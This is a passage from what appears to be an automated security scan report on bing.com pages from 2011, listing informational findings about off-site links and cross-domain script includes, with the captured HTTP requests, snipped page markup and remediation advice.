SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001205
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_UserLocation=Colorado Springs, CO; path=/local
Set-Cookie: VE_UserLatLong=38.83310995996,-104.821729436517; path=/local
Set-Cookie: VE_LSV=cache=0; path=/local/us/co/colorado%20springs
Content-Length: 26370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
</script>

       <link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110127.750" />

       <!-- IE6 Specific Style Rules -->
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=colorado%20springs%2c%20co%2c%20us&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3dcolorado%20springs%252c%2bco%252c%2bus%26%26form%3dllsv" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.7. http://www.bing.com/local/us/dc/washington/restaurants/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/dc/washington/restaurants/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /local/us/dc/washington/restaurants/?cat=11168&q=Restaurants&maxcount=4797&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:37:59 GMT
Last-Modified: Fri, 11 Feb 2011 22:37:59 GMT
X-BM-TraceID: a58b304d7fbc4d6ca32567cddb61ef32
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001204
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:37:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/us/dc/washington/restaurants
Content-Length: 81374


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
</script>

       <link rel = "stylesheet" type = "text/css" href = "http://sc1.maps.live.com/localsearch/css/en-us/kiev.css?cb=20110127.750" />

       <!-- IE6 Specific Style Rules -->
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
wMDUyQ0I=" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '0', 'YellowPages-LSV', 'DWLPAV');"><img id="AdResultSetControl_rpt1_ctl00_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC260551.gif" style="border-width:0px;" /></a>
...[SNIP]...
wMDU0MDI=" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '1', 'YellowPages-LSV', 'DWLPAV');"><img id="AdResultSetControl_rpt1_ctl01_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC92973.gif" style="border-width:0px;" /></a>
...[SNIP]...
<div id="AdResultSetControl_adsSponsored" class="adsSponsoredContainer">
<a id="AdResultSetControl_adsSponsoredLabel" class="adsSponsoredLink" href="http://listings.yellowpages.com/documents/special_offers/jump-msn.asp?from=maps_localsearch_com" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', ''); ">Advertise here</a>
...[SNIP]...
<div id="srs_rpt1_ctl00_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl00_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3137627\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137627', '0', '');" Width="75" align="center" src="http://blufiles.storage.msn.com/y1prg_6cJYChXMBpSrR2CyVt1M5A9kccp3DqvLzulHMmftXMCVLtB8CNqRIgBUdXfqYIFJFlIDhox0" style="border-width:0px;" />
<a id="srs_rpt1_ctl00_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl00_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl00_sritem_ec2_ohlWeb" href="http://www.hotelhelix.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137627', '0', ''); " target="_self">Website</a>
...[SNIP]...
</a>


<a id="srs_rpt1_ctl00_sritem_ec2_ohlBookOnline" class=" ecDotDynamic" href="http://www.hotelhelix.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137627', '0', ''); ">Reservations</a>
...[SNIP]...
<div id="srs_rpt1_ctl01_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl01_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3125023\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3125023', '1', '');" Width="75" align="center" src="http://byfiles.storage.msn.com/y1pqiyeF9LCo-dLWl58_T7ZqCIRHsJMI75PmY-JbXgtPMb7YnezaSYYHjhS1o1hTQjOAcgtF0gTKJ8" style="border-width:0px;" />
<a id="srs_rpt1_ctl01_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl01_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl01_sritem_ec2_ohlWeb" href="http://www.zaytinya.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3125023', '1', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl02_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl02_sritem_ec2_ohlWeb" href="http://www.tabardinn.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x172195977', '2', ''); " target="_self">Website</a>
...[SNIP]...
</a>


<a id="srs_rpt1_ctl02_sritem_ec2_ohlBookOnline" class=" ecDotDynamic" href="http://washingtondc.citysearch.com/profile/reservation/2163153/washington_dc/tabard_inn.html" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x172195977', '2', ''); ">Reservations</a>
...[SNIP]...
<div id="srs_rpt1_ctl03_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl03_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3154350\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3154350', '3', '');" Width="75" align="center" src="http://images.travelnow.com/hotels/1000000/10000/7100/7004/7004_42_t.jpg" style="border-width:0px;" />
<a id="srs_rpt1_ctl03_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
</a>

<a id="srs_rpt1_ctl03_sritem_ec2_reservation" class="ecReservation ecClickable printHide" href="http://msn.orbitz.com/App/ViewSpecificHotelLP?masterId=45515&amp;gtkw=45515" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3154350', '3', '');"><img src="/local/i/bookit.gif" id="srs_rpt1_ctl03_sritem_ec2_bookItImage" alt="Book it" />
...[SNIP]...
<div id="srs_rpt1_ctl03_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl03_sritem_ec2_ohlWeb" href="http://thechurchillhotel.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3154350', '3', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl04_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl04_sritem_ec2_ohlWeb" href="http://www.benschilibowl.com/ordereze/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3153878', '4', ''); " target="_self">Website</a>
...[SNIP]...
</a>


<a id="srs_rpt1_ctl04_sritem_ec2_ohlBookOnline" class=" ecDotDynamic" href="http://washingtondc.citysearch.com/profile/reservation/2150013/washington_dc/ben_s_chili_bowl.html" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3153878', '4', ''); ">Reservations</a>
...[SNIP]...
<div id="srs_rpt1_ctl05_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl05_sritem_ec2_ohlWeb" href="http://www.ebbitt.com/main/home.cfm?Section=Main&amp;Category=About_the_Ebbitt" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3137576', '5', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl06_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl06_sritem_ec2_ohlWeb" href="http://www.citronelledc.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x220138323', '6', ''); " target="_self">Website</a>
...[SNIP]...
</a>

<a id="srs_rpt1_ctl06_sritem_ec2_ohlMenu" class=" ecDotDynamic" href="http://www.citronelledc.com/pdf/menu.pdf" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x220138323', '6', ''); ">Menu</a>
...[SNIP]...
<div id="srs_rpt1_ctl07_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl07_sritem_ec2_ohlWeb" href="http://www.limarestaurant.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x219981357', '7', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl08_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl08_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3134319\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3134319', '8', '');" Width="75" align="center" src="http://blufiles.storage.msn.com/y1pAxFO0FPqP-0U3ChD2uMxfKnF6U_17DHSxyLqwMSUUgZW35ZQklkcmjNQIPiPVUvGaBoe4-nAuQ-8PZPDQ7RTAQ" style="border-width:0px;" />
<a id="srs_rpt1_ctl08_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl08_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl08_sritem_ec2_ohlWeb" href="http://www.cafeatlantico.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3134319', '8', ''); " target="_self">Website</a>
...[SNIP]...
<div id="srs_rpt1_ctl09_sritem_ec2_brandHost" class="ecBrand ecPhotoThumbnailContainer">
<img id="srs_rpt1_ctl09_sritem_ec2_brandLogo" class="ecClickable" onclick="window.open('http\x3A\x2F\x2Fwww.bing.com\x2Flocal\x2Fdetails.aspx\x3Flid\x3DYN165x3178114\x26q\x3DRestaurants\x26tab\x3Dphotos\x26qt\x3Dyp\x26tid\x3Dde23686c9d194a6fb644dc125b68270e\x26FORM\x3DLLSV', '_self');VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3178114', '9', '');" Width="75" align="center" src="http://blufiles.storage.msn.com/y1p6A0u-E5KbWsEcrq7KpvoUMh1jy1pjVYgcA4Nkvq2ybi2boZEjQOy1HhSW02yiJbKoTgPfHXtMH0" style="border-width:0px;" />
<a id="srs_rpt1_ctl09_sritem_ec2_brandAction" class="ecBrandAction" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); ">
...[SNIP]...
<div id="srs_rpt1_ctl09_sritem_ec2_actionLinksBottom" class="ecActionLinks">
<a id="srs_rpt1_ctl09_sritem_ec2_ohlWeb" href="http://www.gwuinn.com/" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3178114', '9', ''); " target="_self">Website</a>
...[SNIP]...
</a>


<a id="srs_rpt1_ctl09_sritem_ec2_ohlBookOnline" class=" ecDotDynamic" href="http://tinyurl.com/ybnhbuy" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), 'YN165x3178114', '9', ''); ">Reservations</a>
...[SNIP]...
MDU2OTg=" onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '0', 'YellowPages-LSV', 'DWLPACV');"><img id="SecondaryAdResultSetControl_rpt1_ctl00_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC291265.gif" style="border-width:0px;" /></a>
...[SNIP]...
Image" href onclick="VE_AnalyticsEngine.LogClick(this.id, document.getElementById(this.id)); VE_AnalyticsEngine.LogAdClick(this.id, document.getElementById(this.id), '1', 'YellowPages-LSV', 'DLPAV');"><img id="SecondaryAdResultSetControl_rpt1_ctl01_sritem_ac1_imgImage" class="acClickable" src="http://c66.yellowpages.com/newdisplay_distr/ypc/DC272700.gif" style="border-width:0px;" /></a>
...[SNIP]...
<div id="SecondaryAdResultSetControl_adsSponsored" class="adsSponsoredContainer">
<a id="SecondaryAdResultSetControl_adsSponsoredLabel" class="adsSponsoredLink" href="http://listings.yellowpages.com/documents/special_offers/jump-msn.asp?from=maps_localsearch_com" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', ''); ">Advertise here</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=washington%2c%20dc%2c%20us&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdefault.aspx%3fwhere%3dwashington%252c%2bdc%252c%2bus%26cat%3d11168%26q%3dRestaurants%26maxcount%3d4797%26FORM%3dLLSV" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.8. http://www.bing.com/settings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /settings.aspx

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /settings.aspx?ru=http%3a%2f%2fwww.bing.com%3a80%2flocal%2f&FORM=SEFD1 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 23:28:15 GMT
Connection: close
Content-Length: 19079

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,33.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,35.1')">Hotmail</a>
...[SNIP]...
to filter adult content, but it won't catch everything. If you see inappropriate content despite applying your SafeSearch setting, let us know so that we can filter it in the future. Learn more about <a href="http://onlinehelp.microsoft.com/en-US/bing/ff808441.aspx" onmousedown="return si_T('&amp;ID=SERP,109.1')">filtering offensive sites</a> and <a href="http://www.microsoft.com/protect/default.aspx" onmousedown="return si_T('&amp;ID=SERP,110.1')">staying safe online</a>
...[SNIP]...
</strong> Ensure that SafeSearch is always on when your kids search on Bing, choose what they see online, set time limits and game restrictions, and more. Windows users can install the free download, <a href="http://g.live.com/0fsenus4/Client" onmousedown="return si_T('&amp;ID=SERP,111.1')">Windows Live Family Safety</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,45.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,47.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,49.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,51.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,53.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,55.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?locale=en-US&amp;productkey=wlsearchweb&amp;P1=dsatsettings&amp;P2=&amp;P3=badger&amp;P4=SEFD1&amp;P5=DC63BAA44C3843F38378B4BB213E0A6F&amp;P6=Washington%2c+District+Of+Columbia&amp;P7=Original&amp;P8=&amp;P9=38.9069%2f-77.0284&amp;P10=24902&amp;P11=http%3a%2f%2fwww.bing.com%2flocal%2f&amp;P12=&amp;searchtype=Web+Search&amp;optl1=1&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2fsettings.aspx%3fru%3dhttp%253a%252f%252fwww.bing.com%253a80%252flocal%252f%26FORM%3dFEEDTU" id="sb_feedback" onclick="si_fb.openCard(this);return false" onfocus="si_fb.loadCard()" onmousedown="return si_T('&amp;ID=FD,57.1')">Tell us what you think</a>
...[SNIP]...

6. Cross-domain script include
There are 9 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.bing.com/shopping/classic-womens-fragrances/r/162

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /shopping/classic-womens-fragrances/r/162

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /shopping/classic-womens-fragrances/r/162 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Fri, 11 Feb 2011 21:45:26 GMT
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:45:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:45:27 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=C0C28A6164ED41C38DC21B95216F1854; domain=.bing.com; path=/
Content-Length: 53787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web=
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

6.2. http://www.bing.com/travel/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /travel/ HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=BDCE=129419172975962066&BDCEH=80D06F26B0F5899E4513533F0785A1D5; _UR=OMW=0; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Fri, 11 Feb 2011 21:46:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: lbc=819; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z4gm3vtmq19cv3yz780quprn4otsl_VID-z1oq4m4dn99d87yz72fovekggbn1v_UID-; Domain=.bing.com; Expires=Sun, 10-Feb-2013 21:46:12 GMT; Path=/travel
Set-Cookie: JSESSIONID=2C453B42A8BD6A784D623C2DF0E8BB7A; Domain=.bing.com; Path=/travel
Set-Cookie: _FP=; expires=Sun, 10-Feb-2013 21:46:12 GMT; domain=.bing.com; path=/
Set-Cookie: _SS=SID=3F8AAA80A722410C8B09878099EDA1CA; domain=.bing.com; path=/
Content-Length: 87698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

6.3. http://www.bing.com/videos/browse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /videos/browse HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
